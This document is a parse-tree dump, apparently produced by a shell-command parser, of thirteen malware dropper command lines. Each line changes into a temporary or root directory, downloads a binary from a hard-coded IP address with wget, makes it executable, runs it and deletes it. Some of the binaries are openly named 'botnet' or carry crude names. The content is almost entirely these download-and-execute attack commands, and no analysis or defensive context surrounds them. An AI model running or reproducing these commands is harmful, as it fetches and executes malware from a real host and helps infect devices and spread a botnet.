ListNode(lineno=2, pos=(12, 133), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 97), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 97), word='http://80.211.198.60/cock'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(97, 98)),
  CommandNode(lineno=2, pos=(99, 112), parts=[
    WordNode(lineno=2, pos=(99, 104), word='chmod'),
    WordNode(lineno=2, pos=(105, 107), word='+x'),
    WordNode(lineno=2, pos=(108, 112), word='cock'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(112, 113)),
  CommandNode(lineno=2, pos=(114, 120), parts=[
    WordNode(lineno=2, pos=(114, 120), word='./cock'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(120, 121)),
  CommandNode(lineno=2, pos=(122, 133), parts=[
    WordNode(lineno=2, pos=(122, 124), word='rm'),
    WordNode(lineno=2, pos=(125, 128), word='-rf'),
    WordNode(lineno=2, pos=(129, 133), word='cock'),
  ]),
])
ListNode(lineno=3, pos=(134, 251), parts=[
  CommandNode(lineno=3, pos=(134, 141), parts=[
    WordNode(lineno=3, pos=(134, 136), word='cd'),
    WordNode(lineno=3, pos=(137, 141), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(142, 144)),
  CommandNode(lineno=3, pos=(145, 156), parts=[
    WordNode(lineno=3, pos=(145, 147), word='cd'),
    WordNode(lineno=3, pos=(148, 156), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(157, 159)),
  CommandNode(lineno=3, pos=(160, 167), parts=[
    WordNode(lineno=3, pos=(160, 162), word='cd'),
    WordNode(lineno=3, pos=(163, 167), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(168, 170)),
  CommandNode(lineno=3, pos=(171, 179), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 179), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 187), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 187), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(187, 188)),
  CommandNode(lineno=3, pos=(189, 218), parts=[
    WordNode(lineno=3, pos=(189, 193), word='wget'),
    WordNode(lineno=3, pos=(194, 218), word='http://80.211.198.60/net'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(218, 219)),
  CommandNode(lineno=3, pos=(220, 232), parts=[
    WordNode(lineno=3, pos=(220, 225), word='chmod'),
    WordNode(lineno=3, pos=(226, 228), word='+x'),
    WordNode(lineno=3, pos=(229, 232), word='net'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(232, 233)),
  CommandNode(lineno=3, pos=(234, 239), parts=[
    WordNode(lineno=3, pos=(234, 239), word='./net'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(239, 240)),
  CommandNode(lineno=3, pos=(241, 251), parts=[
    WordNode(lineno=3, pos=(241, 243), word='rm'),
    WordNode(lineno=3, pos=(244, 247), word='-rf'),
    WordNode(lineno=3, pos=(248, 251), word='net'),
  ]),
])
ListNode(lineno=4, pos=(252, 381), parts=[
  CommandNode(lineno=4, pos=(252, 259), parts=[
    WordNode(lineno=4, pos=(252, 254), word='cd'),
    WordNode(lineno=4, pos=(255, 259), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(260, 262)),
  CommandNode(lineno=4, pos=(263, 274), parts=[
    WordNode(lineno=4, pos=(263, 265), word='cd'),
    WordNode(lineno=4, pos=(266, 274), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(275, 277)),
  CommandNode(lineno=4, pos=(278, 285), parts=[
    WordNode(lineno=4, pos=(278, 280), word='cd'),
    WordNode(lineno=4, pos=(281, 285), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(286, 288)),
  CommandNode(lineno=4, pos=(289, 297), parts=[
    WordNode(lineno=4, pos=(289, 291), word='cd'),
    WordNode(lineno=4, pos=(292, 297), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(298, 300)),
  CommandNode(lineno=4, pos=(301, 305), parts=[
    WordNode(lineno=4, pos=(301, 303), word='cd'),
    WordNode(lineno=4, pos=(304, 305), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(305, 306)),
  CommandNode(lineno=4, pos=(307, 339), parts=[
    WordNode(lineno=4, pos=(307, 311), word='wget'),
    WordNode(lineno=4, pos=(312, 339), word='http://80.211.198.60/botnet'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(339, 340)),
  CommandNode(lineno=4, pos=(341, 356), parts=[
    WordNode(lineno=4, pos=(341, 346), word='chmod'),
    WordNode(lineno=4, pos=(347, 349), word='+x'),
    WordNode(lineno=4, pos=(350, 356), word='botnet'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(356, 357)),
  CommandNode(lineno=4, pos=(358, 366), parts=[
    WordNode(lineno=4, pos=(358, 366), word='./botnet'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(366, 367)),
  CommandNode(lineno=4, pos=(368, 381), parts=[
    WordNode(lineno=4, pos=(368, 370), word='rm'),
    WordNode(lineno=4, pos=(371, 374), word='-rf'),
    WordNode(lineno=4, pos=(375, 381), word='botnet'),
  ]),
])
ListNode(lineno=5, pos=(382, 515), parts=[
  CommandNode(lineno=5, pos=(382, 389), parts=[
    WordNode(lineno=5, pos=(382, 384), word='cd'),
    WordNode(lineno=5, pos=(385, 389), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(390, 392)),
  CommandNode(lineno=5, pos=(393, 404), parts=[
    WordNode(lineno=5, pos=(393, 395), word='cd'),
    WordNode(lineno=5, pos=(396, 404), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(405, 407)),
  CommandNode(lineno=5, pos=(408, 415), parts=[
    WordNode(lineno=5, pos=(408, 410), word='cd'),
    WordNode(lineno=5, pos=(411, 415), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(416, 418)),
  CommandNode(lineno=5, pos=(419, 427), parts=[
    WordNode(lineno=5, pos=(419, 421), word='cd'),
    WordNode(lineno=5, pos=(422, 427), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(428, 430)),
  CommandNode(lineno=5, pos=(431, 435), parts=[
    WordNode(lineno=5, pos=(431, 433), word='cd'),
    WordNode(lineno=5, pos=(434, 435), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(435, 436)),
  CommandNode(lineno=5, pos=(437, 470), parts=[
    WordNode(lineno=5, pos=(437, 441), word='wget'),
    WordNode(lineno=5, pos=(442, 470), word='http://80.211.198.60/swatnet'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(470, 471)),
  CommandNode(lineno=5, pos=(472, 488), parts=[
    WordNode(lineno=5, pos=(472, 477), word='chmod'),
    WordNode(lineno=5, pos=(478, 480), word='+x'),
    WordNode(lineno=5, pos=(481, 488), word='swatnet'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(488, 489)),
  CommandNode(lineno=5, pos=(490, 499), parts=[
    WordNode(lineno=5, pos=(490, 499), word='./swatnet'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(499, 500)),
  CommandNode(lineno=5, pos=(501, 515), parts=[
    WordNode(lineno=5, pos=(501, 503), word='rm'),
    WordNode(lineno=5, pos=(504, 507), word='-rf'),
    WordNode(lineno=5, pos=(508, 515), word='swatnet'),
  ]),
])
ListNode(lineno=6, pos=(516, 649), parts=[
  CommandNode(lineno=6, pos=(516, 523), parts=[
    WordNode(lineno=6, pos=(516, 518), word='cd'),
    WordNode(lineno=6, pos=(519, 523), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(524, 526)),
  CommandNode(lineno=6, pos=(527, 538), parts=[
    WordNode(lineno=6, pos=(527, 529), word='cd'),
    WordNode(lineno=6, pos=(530, 538), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(539, 541)),
  CommandNode(lineno=6, pos=(542, 549), parts=[
    WordNode(lineno=6, pos=(542, 544), word='cd'),
    WordNode(lineno=6, pos=(545, 549), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(550, 552)),
  CommandNode(lineno=6, pos=(553, 561), parts=[
    WordNode(lineno=6, pos=(553, 555), word='cd'),
    WordNode(lineno=6, pos=(556, 561), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(562, 564)),
  CommandNode(lineno=6, pos=(565, 569), parts=[
    WordNode(lineno=6, pos=(565, 567), word='cd'),
    WordNode(lineno=6, pos=(568, 569), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(569, 570)),
  CommandNode(lineno=6, pos=(571, 604), parts=[
    WordNode(lineno=6, pos=(571, 575), word='wget'),
    WordNode(lineno=6, pos=(576, 604), word='http://80.211.198.60/dicknet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(604, 605)),
  CommandNode(lineno=6, pos=(606, 622), parts=[
    WordNode(lineno=6, pos=(606, 611), word='chmod'),
    WordNode(lineno=6, pos=(612, 614), word='+x'),
    WordNode(lineno=6, pos=(615, 622), word='dicknet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(622, 623)),
  CommandNode(lineno=6, pos=(624, 633), parts=[
    WordNode(lineno=6, pos=(624, 633), word='./dicknet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(633, 634)),
  CommandNode(lineno=6, pos=(635, 649), parts=[
    WordNode(lineno=6, pos=(635, 637), word='rm'),
    WordNode(lineno=6, pos=(638, 641), word='-rf'),
    WordNode(lineno=6, pos=(642, 649), word='dicknet'),
  ]),
])
ListNode(lineno=7, pos=(650, 783), parts=[
  CommandNode(lineno=7, pos=(650, 657), parts=[
    WordNode(lineno=7, pos=(650, 652), word='cd'),
    WordNode(lineno=7, pos=(653, 657), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(658, 660)),
  CommandNode(lineno=7, pos=(661, 672), parts=[
    WordNode(lineno=7, pos=(661, 663), word='cd'),
    WordNode(lineno=7, pos=(664, 672), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(673, 675)),
  CommandNode(lineno=7, pos=(676, 683), parts=[
    WordNode(lineno=7, pos=(676, 678), word='cd'),
    WordNode(lineno=7, pos=(679, 683), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(684, 686)),
  CommandNode(lineno=7, pos=(687, 695), parts=[
    WordNode(lineno=7, pos=(687, 689), word='cd'),
    WordNode(lineno=7, pos=(690, 695), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(696, 698)),
  CommandNode(lineno=7, pos=(699, 703), parts=[
    WordNode(lineno=7, pos=(699, 701), word='cd'),
    WordNode(lineno=7, pos=(702, 703), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(703, 704)),
  CommandNode(lineno=7, pos=(705, 738), parts=[
    WordNode(lineno=7, pos=(705, 709), word='wget'),
    WordNode(lineno=7, pos=(710, 738), word='http://80.211.198.60/fucknet'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(738, 739)),
  CommandNode(lineno=7, pos=(740, 756), parts=[
    WordNode(lineno=7, pos=(740, 745), word='chmod'),
    WordNode(lineno=7, pos=(746, 748), word='+x'),
    WordNode(lineno=7, pos=(749, 756), word='fucknet'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(756, 757)),
  CommandNode(lineno=7, pos=(758, 767), parts=[
    WordNode(lineno=7, pos=(758, 767), word='./fucknet'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(767, 768)),
  CommandNode(lineno=7, pos=(769, 783), parts=[
    WordNode(lineno=7, pos=(769, 771), word='rm'),
    WordNode(lineno=7, pos=(772, 775), word='-rf'),
    WordNode(lineno=7, pos=(776, 783), word='fucknet'),
  ]),
])
ListNode(lineno=8, pos=(784, 921), parts=[
  CommandNode(lineno=8, pos=(784, 791), parts=[
    WordNode(lineno=8, pos=(784, 786), word='cd'),
    WordNode(lineno=8, pos=(787, 791), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(792, 794)),
  CommandNode(lineno=8, pos=(795, 806), parts=[
    WordNode(lineno=8, pos=(795, 797), word='cd'),
    WordNode(lineno=8, pos=(798, 806), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(807, 809)),
  CommandNode(lineno=8, pos=(810, 817), parts=[
    WordNode(lineno=8, pos=(810, 812), word='cd'),
    WordNode(lineno=8, pos=(813, 817), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(818, 820)),
  CommandNode(lineno=8, pos=(821, 829), parts=[
    WordNode(lineno=8, pos=(821, 823), word='cd'),
    WordNode(lineno=8, pos=(824, 829), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(830, 832)),
  CommandNode(lineno=8, pos=(833, 837), parts=[
    WordNode(lineno=8, pos=(833, 835), word='cd'),
    WordNode(lineno=8, pos=(836, 837), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(837, 838)),
  CommandNode(lineno=8, pos=(839, 873), parts=[
    WordNode(lineno=8, pos=(839, 843), word='wget'),
    WordNode(lineno=8, pos=(844, 873), word='http://80.211.198.60/cracknet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(873, 874)),
  CommandNode(lineno=8, pos=(875, 892), parts=[
    WordNode(lineno=8, pos=(875, 880), word='chmod'),
    WordNode(lineno=8, pos=(881, 883), word='+x'),
    WordNode(lineno=8, pos=(884, 892), word='cracknet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(892, 893)),
  CommandNode(lineno=8, pos=(894, 904), parts=[
    WordNode(lineno=8, pos=(894, 904), word='./cracknet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(904, 905)),
  CommandNode(lineno=8, pos=(906, 921), parts=[
    WordNode(lineno=8, pos=(906, 908), word='rm'),
    WordNode(lineno=8, pos=(909, 912), word='-rf'),
    WordNode(lineno=8, pos=(913, 921), word='cracknet'),
  ]),
])
ListNode(lineno=9, pos=(922, 1055), parts=[
  CommandNode(lineno=9, pos=(922, 929), parts=[
    WordNode(lineno=9, pos=(922, 924), word='cd'),
    WordNode(lineno=9, pos=(925, 929), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(930, 932)),
  CommandNode(lineno=9, pos=(933, 944), parts=[
    WordNode(lineno=9, pos=(933, 935), word='cd'),
    WordNode(lineno=9, pos=(936, 944), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(945, 947)),
  CommandNode(lineno=9, pos=(948, 955), parts=[
    WordNode(lineno=9, pos=(948, 950), word='cd'),
    WordNode(lineno=9, pos=(951, 955), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(956, 958)),
  CommandNode(lineno=9, pos=(959, 967), parts=[
    WordNode(lineno=9, pos=(959, 961), word='cd'),
    WordNode(lineno=9, pos=(962, 967), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(968, 970)),
  CommandNode(lineno=9, pos=(971, 975), parts=[
    WordNode(lineno=9, pos=(971, 973), word='cd'),
    WordNode(lineno=9, pos=(974, 975), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(975, 976)),
  CommandNode(lineno=9, pos=(977, 1010), parts=[
    WordNode(lineno=9, pos=(977, 981), word='wget'),
    WordNode(lineno=9, pos=(982, 1010), word='http://80.211.198.60/weednet'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1010, 1011)),
  CommandNode(lineno=9, pos=(1012, 1028), parts=[
    WordNode(lineno=9, pos=(1012, 1017), word='chmod'),
    WordNode(lineno=9, pos=(1018, 1020), word='+x'),
    WordNode(lineno=9, pos=(1021, 1028), word='weednet'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1028, 1029)),
  CommandNode(lineno=9, pos=(1030, 1039), parts=[
    WordNode(lineno=9, pos=(1030, 1039), word='./weednet'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1039, 1040)),
  CommandNode(lineno=9, pos=(1041, 1055), parts=[
    WordNode(lineno=9, pos=(1041, 1043), word='rm'),
    WordNode(lineno=9, pos=(1044, 1047), word='-rf'),
    WordNode(lineno=9, pos=(1048, 1055), word='weednet'),
  ]),
])
ListNode(lineno=10, pos=(1056, 1185), parts=[
  CommandNode(lineno=10, pos=(1056, 1063), parts=[
    WordNode(lineno=10, pos=(1056, 1058), word='cd'),
    WordNode(lineno=10, pos=(1059, 1063), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1064, 1066)),
  CommandNode(lineno=10, pos=(1067, 1078), parts=[
    WordNode(lineno=10, pos=(1067, 1069), word='cd'),
    WordNode(lineno=10, pos=(1070, 1078), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1079, 1081)),
  CommandNode(lineno=10, pos=(1082, 1089), parts=[
    WordNode(lineno=10, pos=(1082, 1084), word='cd'),
    WordNode(lineno=10, pos=(1085, 1089), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1090, 1092)),
  CommandNode(lineno=10, pos=(1093, 1101), parts=[
    WordNode(lineno=10, pos=(1093, 1095), word='cd'),
    WordNode(lineno=10, pos=(1096, 1101), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1102, 1104)),
  CommandNode(lineno=10, pos=(1105, 1109), parts=[
    WordNode(lineno=10, pos=(1105, 1107), word='cd'),
    WordNode(lineno=10, pos=(1108, 1109), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1109, 1110)),
  CommandNode(lineno=10, pos=(1111, 1143), parts=[
    WordNode(lineno=10, pos=(1111, 1115), word='wget'),
    WordNode(lineno=10, pos=(1116, 1143), word='http://80.211.198.60/gaynet'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1143, 1144)),
  CommandNode(lineno=10, pos=(1145, 1160), parts=[
    WordNode(lineno=10, pos=(1145, 1150), word='chmod'),
    WordNode(lineno=10, pos=(1151, 1153), word='+x'),
    WordNode(lineno=10, pos=(1154, 1160), word='gaynet'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1160, 1161)),
  CommandNode(lineno=10, pos=(1162, 1170), parts=[
    WordNode(lineno=10, pos=(1162, 1170), word='./gaynet'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1170, 1171)),
  CommandNode(lineno=10, pos=(1172, 1185), parts=[
    WordNode(lineno=10, pos=(1172, 1174), word='rm'),
    WordNode(lineno=10, pos=(1175, 1178), word='-rf'),
    WordNode(lineno=10, pos=(1179, 1185), word='gaynet'),
  ]),
])
ListNode(lineno=11, pos=(1186, 1323), parts=[
  CommandNode(lineno=11, pos=(1186, 1193), parts=[
    WordNode(lineno=11, pos=(1186, 1188), word='cd'),
    WordNode(lineno=11, pos=(1189, 1193), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1194, 1196)),
  CommandNode(lineno=11, pos=(1197, 1208), parts=[
    WordNode(lineno=11, pos=(1197, 1199), word='cd'),
    WordNode(lineno=11, pos=(1200, 1208), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1209, 1211)),
  CommandNode(lineno=11, pos=(1212, 1219), parts=[
    WordNode(lineno=11, pos=(1212, 1214), word='cd'),
    WordNode(lineno=11, pos=(1215, 1219), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1220, 1222)),
  CommandNode(lineno=11, pos=(1223, 1231), parts=[
    WordNode(lineno=11, pos=(1223, 1225), word='cd'),
    WordNode(lineno=11, pos=(1226, 1231), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1232, 1234)),
  CommandNode(lineno=11, pos=(1235, 1239), parts=[
    WordNode(lineno=11, pos=(1235, 1237), word='cd'),
    WordNode(lineno=11, pos=(1238, 1239), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1239, 1240)),
  CommandNode(lineno=11, pos=(1241, 1275), parts=[
    WordNode(lineno=11, pos=(1241, 1245), word='wget'),
    WordNode(lineno=11, pos=(1246, 1275), word='http://80.211.198.60/queernet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1275, 1276)),
  CommandNode(lineno=11, pos=(1277, 1294), parts=[
    WordNode(lineno=11, pos=(1277, 1282), word='chmod'),
    WordNode(lineno=11, pos=(1283, 1285), word='+x'),
    WordNode(lineno=11, pos=(1286, 1294), word='queernet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1294, 1295)),
  CommandNode(lineno=11, pos=(1296, 1306), parts=[
    WordNode(lineno=11, pos=(1296, 1306), word='./queernet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1306, 1307)),
  CommandNode(lineno=11, pos=(1308, 1323), parts=[
    WordNode(lineno=11, pos=(1308, 1310), word='rm'),
    WordNode(lineno=11, pos=(1311, 1314), word='-rf'),
    WordNode(lineno=11, pos=(1315, 1323), word='queernet'),
  ]),
])
ListNode(lineno=12, pos=(1324, 1457), parts=[
  CommandNode(lineno=12, pos=(1324, 1331), parts=[
    WordNode(lineno=12, pos=(1324, 1326), word='cd'),
    WordNode(lineno=12, pos=(1327, 1331), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1332, 1334)),
  CommandNode(lineno=12, pos=(1335, 1346), parts=[
    WordNode(lineno=12, pos=(1335, 1337), word='cd'),
    WordNode(lineno=12, pos=(1338, 1346), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1347, 1349)),
  CommandNode(lineno=12, pos=(1350, 1357), parts=[
    WordNode(lineno=12, pos=(1350, 1352), word='cd'),
    WordNode(lineno=12, pos=(1353, 1357), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1358, 1360)),
  CommandNode(lineno=12, pos=(1361, 1369), parts=[
    WordNode(lineno=12, pos=(1361, 1363), word='cd'),
    WordNode(lineno=12, pos=(1364, 1369), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1370, 1372)),
  CommandNode(lineno=12, pos=(1373, 1377), parts=[
    WordNode(lineno=12, pos=(1373, 1375), word='cd'),
    WordNode(lineno=12, pos=(1376, 1377), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1377, 1378)),
  CommandNode(lineno=12, pos=(1379, 1412), parts=[
    WordNode(lineno=12, pos=(1379, 1383), word='wget'),
    WordNode(lineno=12, pos=(1384, 1412), word='http://80.211.198.60/ballnet'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1412, 1413)),
  CommandNode(lineno=12, pos=(1414, 1430), parts=[
    WordNode(lineno=12, pos=(1414, 1419), word='chmod'),
    WordNode(lineno=12, pos=(1420, 1422), word='+x'),
    WordNode(lineno=12, pos=(1423, 1430), word='ballnet'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1430, 1431)),
  CommandNode(lineno=12, pos=(1432, 1441), parts=[
    WordNode(lineno=12, pos=(1432, 1441), word='./ballnet'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1441, 1442)),
  CommandNode(lineno=12, pos=(1443, 1457), parts=[
    WordNode(lineno=12, pos=(1443, 1445), word='rm'),
    WordNode(lineno=12, pos=(1446, 1449), word='-rf'),
    WordNode(lineno=12, pos=(1450, 1457), word='ballnet'),
  ]),
])
ListNode(lineno=13, pos=(1458, 1579), parts=[
  CommandNode(lineno=13, pos=(1458, 1465), parts=[
    WordNode(lineno=13, pos=(1458, 1460), word='cd'),
    WordNode(lineno=13, pos=(1461, 1465), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1466, 1468)),
  CommandNode(lineno=13, pos=(1469, 1480), parts=[
    WordNode(lineno=13, pos=(1469, 1471), word='cd'),
    WordNode(lineno=13, pos=(1472, 1480), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1481, 1483)),
  CommandNode(lineno=13, pos=(1484, 1491), parts=[
    WordNode(lineno=13, pos=(1484, 1486), word='cd'),
    WordNode(lineno=13, pos=(1487, 1491), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1492, 1494)),
  CommandNode(lineno=13, pos=(1495, 1503), parts=[
    WordNode(lineno=13, pos=(1495, 1497), word='cd'),
    WordNode(lineno=13, pos=(1498, 1503), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1504, 1506)),
  CommandNode(lineno=13, pos=(1507, 1511), parts=[
    WordNode(lineno=13, pos=(1507, 1509), word='cd'),
    WordNode(lineno=13, pos=(1510, 1511), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1511, 1512)),
  CommandNode(lineno=13, pos=(1513, 1543), parts=[
    WordNode(lineno=13, pos=(1513, 1517), word='wget'),
    WordNode(lineno=13, pos=(1518, 1543), word='http://80.211.198.60/unet'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1543, 1544)),
  CommandNode(lineno=13, pos=(1545, 1558), parts=[
    WordNode(lineno=13, pos=(1545, 1550), word='chmod'),
    WordNode(lineno=13, pos=(1551, 1553), word='+x'),
    WordNode(lineno=13, pos=(1554, 1558), word='unet'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1558, 1559)),
  CommandNode(lineno=13, pos=(1560, 1566), parts=[
    WordNode(lineno=13, pos=(1560, 1566), word='./unet'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1566, 1567)),
  CommandNode(lineno=13, pos=(1568, 1579), parts=[
    WordNode(lineno=13, pos=(1568, 1570), word='rm'),
    WordNode(lineno=13, pos=(1571, 1574), word='-rf'),
    WordNode(lineno=13, pos=(1575, 1579), word='unet'),
  ]),
])
ListNode(lineno=14, pos=(1580, 1709), parts=[
  CommandNode(lineno=14, pos=(1580, 1587), parts=[
    WordNode(lineno=14, pos=(1580, 1582), word='cd'),
    WordNode(lineno=14, pos=(1583, 1587), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1588, 1590)),
  CommandNode(lineno=14, pos=(1591, 1602), parts=[
    WordNode(lineno=14, pos=(1591, 1593), word='cd'),
    WordNode(lineno=14, pos=(1594, 1602), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1603, 1605)),
  CommandNode(lineno=14, pos=(1606, 1613), parts=[
    WordNode(lineno=14, pos=(1606, 1608), word='cd'),
    WordNode(lineno=14, pos=(1609, 1613), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1614, 1616)),
  CommandNode(lineno=14, pos=(1617, 1625), parts=[
    WordNode(lineno=14, pos=(1617, 1619), word='cd'),
    WordNode(lineno=14, pos=(1620, 1625), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1626, 1628)),
  CommandNode(lineno=14, pos=(1629, 1633), parts=[
    WordNode(lineno=14, pos=(1629, 1631), word='cd'),
    WordNode(lineno=14, pos=(1632, 1633), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1633, 1634)),
  CommandNode(lineno=14, pos=(1635, 1667), parts=[
    WordNode(lineno=14, pos=(1635, 1639), word='wget'),
    WordNode(lineno=14, pos=(1640, 1667), word='http://80.211.198.60/yougay'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1667, 1668)),
  CommandNode(lineno=14, pos=(1669, 1684), parts=[
    WordNode(lineno=14, pos=(1669, 1674), word='chmod'),
    WordNode(lineno=14, pos=(1675, 1677), word='+x'),
    WordNode(lineno=14, pos=(1678, 1684), word='yougay'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1684, 1685)),
  CommandNode(lineno=14, pos=(1686, 1694), parts=[
    WordNode(lineno=14, pos=(1686, 1694), word='./yougay'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1694, 1695)),
  CommandNode(lineno=14, pos=(1696, 1709), parts=[
    WordNode(lineno=14, pos=(1696, 1698), word='rm'),
    WordNode(lineno=14, pos=(1699, 1702), word='-rf'),
    WordNode(lineno=14, pos=(1703, 1709), word='yougay'),
  ]),
])
